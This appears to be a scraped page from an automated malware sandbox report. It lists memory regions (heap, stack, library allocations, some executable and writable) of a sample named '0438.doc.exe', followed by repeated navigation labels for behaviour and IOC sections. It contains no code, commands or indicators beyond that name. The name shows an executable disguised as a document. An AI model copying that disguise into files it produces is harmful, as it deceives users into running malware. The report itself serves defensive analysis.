trusted library allocation

page read and write

7FF84766A000

trusted library allocation

page read and write

771000

heap

page read and write

A8097E000

stack

page read and write

720000

heap

page read and write

1290E235000

heap

page read and write

7FF847570000

trusted library allocation

page execute and read and write

1290E1B3000

trusted library allocation

page read and write

7FF847800000

trusted library allocation

page read and write

12926747000

heap

page read and write

A50000

heap

page read and write

7FF848E34000

trusted library allocation

page read and write

800000

heap

page read and write

12926D50000

heap

page read and write

1290C757000

heap

page read and write

7FF8475D0000

trusted library allocation

page execute and read and write

12511000

trusted library allocation

page read and write

1290F9E0000

trusted library allocation

page read and write

1291E250000

trusted library allocation

page read and write

1290C77D000

heap

page read and write

A8087F000

stack

page read and write

7FF8474C0000

trusted library allocation

page read and write

129268B0000

heap

page read and write

7DF410990000

trusted library allocation

page execute and read and write

A809F7000

stack

page read and write

1290FE99000

trusted library allocation

page read and write

C14F1FE000

stack

page read and write

7FF8474BD000

trusted library allocation

page execute and read and write

1290E150000

heap

page readonly

12926745000

heap

page read and write

8B0000

trusted library allocation

page read and write

7FF847710000

trusted library allocation

page read and write

7FF8476A0000

trusted library allocation

page execute and read and write

1290E230000

heap

page read and write

7FF848ED0000

trusted library allocation

page read and write

A85000

heap

page read and write

129266F7000

heap

page execute and read and write

7FF8477D0000

trusted library allocation

page read and write

1B3EF000

stack

page read and write

7FF848E24000

trusted library allocation

page read and write

7FF8474B2000

trusted library allocation

page read and write

2AB000

unkown

page readonly

12926A01000

heap

page read and write

129269F4000

heap

page read and write

1290FE94000

trusted library allocation

page read and write

12513000

trusted library allocation

page read and write

C14FAFB000

stack

page read and write

7FF8474B3000

trusted library allocation

page execute and read and write

1B14D000

stack

page read and write

7FF8477F0000

trusted library allocation

page read and write

A807FE000

stack

page read and write

7FF847720000

trusted library allocation

page read and write

129267EC000

heap

page read and write

A80CFF000

stack

page read and write

12926700000

heap

page read and write

7FF848F06000

trusted library allocation

page execute and read and write

1290FDCF000

trusted library allocation

page read and write

7FF8476C0000

trusted library allocation

page read and write

1290C777000

heap

page read and write

129266F0000

heap

page execute and read and write

1290E1B0000

trusted library allocation

page read and write

7FF847790000

trusted library allocation

page read and write

1FE42850000

heap

page read and write

746000

heap

page read and write

A8077D000

stack

page read and write

7FF8477B0000

trusted library allocation

page read and write

1292679C000

heap

page read and write

A808FE000

stack

page read and write

12926A31000

heap

page read and write

1290C900000

heap

page read and write

1FE42B80000

heap

page read and write

1290C710000

heap

page read and write

129267C0000

heap

page read and write

1290F87A000

trusted library allocation

page read and write

1290E110000

trusted library allocation

page read and write

A806FE000

stack

page read and write

C14F0FE000

stack

page read and write

1290C817000

heap

page read and write

A80D7C000

stack

page read and write

7FF847770000

trusted library allocation

page read and write

1FE42820000

heap

page read and write

1B040000

heap

page read and write

A80B7E000

stack

page read and write

A80978000

stack

page read and write

1290EE6E000

trusted library allocation

page read and write

3F6000

stack

page read and write

1290C6E0000

heap

page read and write

B8E000

stack

page read and write

81A000

heap

page read and write

7FF847680000

trusted library allocation

page execute and read and write

7FF847560000

trusted library allocation

page read and write

1290E0D0000

heap

page read and write

12926736000

heap

page read and write

C14F6FF000

stack

page read and write

1291E241000

trusted library allocation

page read and write

12926781000

heap

page read and write

7FF848F40000

trusted library allocation

page execute and read and write

1B24E000

stack

page read and write

A80BFF000

stack

page read and write

7FF847661000

trusted library allocation

page read and write

7FF847740000

trusted library allocation

page read and write

A8039E000

stack

page read and write

12535000

trusted library allocation

page read and write

2400000

heap

page execute and read and write

1290F5B2000

trusted library allocation

page read and write

C14F5FE000

stack

page read and write

1290C6F0000

heap

page read and write

1FE42B40000

heap

page read and write

12926733000

heap

page read and write

7FF847750000

trusted library allocation

page read and write

1AAAC000

stack

page read and write

7FF847730000

trusted library allocation

page read and write

129267F2000

heap

page read and write

1292670A000

heap

page read and write

7FF847780000

trusted library allocation

page read and write

250E000

stack

page read and write

There are 209 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
0438.doc.exe

Files

Processes

URLs

IPs

Registry

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report0438.doc.exe

Files

Processes

URLs

IPs

Registry

Memdumps

IOC Report
0438.doc.exe